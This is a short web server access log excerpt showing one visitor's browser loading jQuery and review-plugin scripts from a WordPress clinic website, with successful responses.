192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 4169 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-yelp-review-slider/public/js/wprev-public.js?ver=6.3 HTTP/1.1" 200 609 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
192.82.245.235 - - [03/Nov/2022:08:07:28 -0700] "GET /wp-content/plugins/wp-facebook-reviews/public/js/wprev-public.js?ver=11.0 HTTP/1.1" 200 610 "https://wellnessconceptsclinic.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26" "wellnessconceptsclinic.com"
